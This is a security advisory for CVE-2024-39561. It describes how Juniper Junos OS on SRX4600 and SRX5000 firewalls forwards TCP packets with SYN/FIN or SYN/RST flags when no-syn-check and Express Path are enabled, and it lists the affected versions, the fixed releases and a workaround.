CVE-2024-39561

Name of the Vulnerable Software and Affected Versions Junos OS versions prior to 21.2R3-S8 Junos OS versions from 21.4 before 21.4R3-S7 Junos OS versions from 22.1 before 22.1R3-S6 Junos OS versions from 22.2 before 22.2R3-S4 Junos OS versions from 22.3 before 22.3R3-S3 Junos OS versions from 22.4 before 22.4R3-S2 Junos OS versions from 23.2 before 23.2R2 Junos OS versions from 23.4 before 23.4R1-S1, 23.4R2

Description The issue is related to an Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX4600 and SRX5000 Series. This vulnerability allows an attacker to send TCP packets with SYN/FIN or SYN/RST flags, bypassing the expected blocking of these packets. Normally, a TCP packet with SYN/FIN or SYN/RST should be dropped in flowd. However, when no-syn-check and Express Path are enabled, these TCP packets are unexpectedly transferred to the downstream network.

Recommendations For versions prior to 21.2R3-S8, update to 21.2R3-S8 or later. For versions from 21.4 before 21.4R3-S7, update to 21.4R3-S7 or later. For versions from 22.1 before 22.1R3-S6, update to 22.1R3-S6 or later. For versions from 22.2 before 22.2R3-S4, update to 22.2R3-S4 or later. For versions from 22.3 before 22.3R3-S3, update to 22.3R3-S3 or later. For versions from 22.4 before 22.4R3-S2, update to 22.4R3-S2 or later. For versions from 23.2 before 23.2R2, update to 23.2R2 or later. For versions from 23.4 before 23.4R1-S1, 23.4R2, update to 23.4R1-S1, 23.4R2 or later. As a temporary workaround, consider disabling the no-syn-check and Express Path features until a patch is available.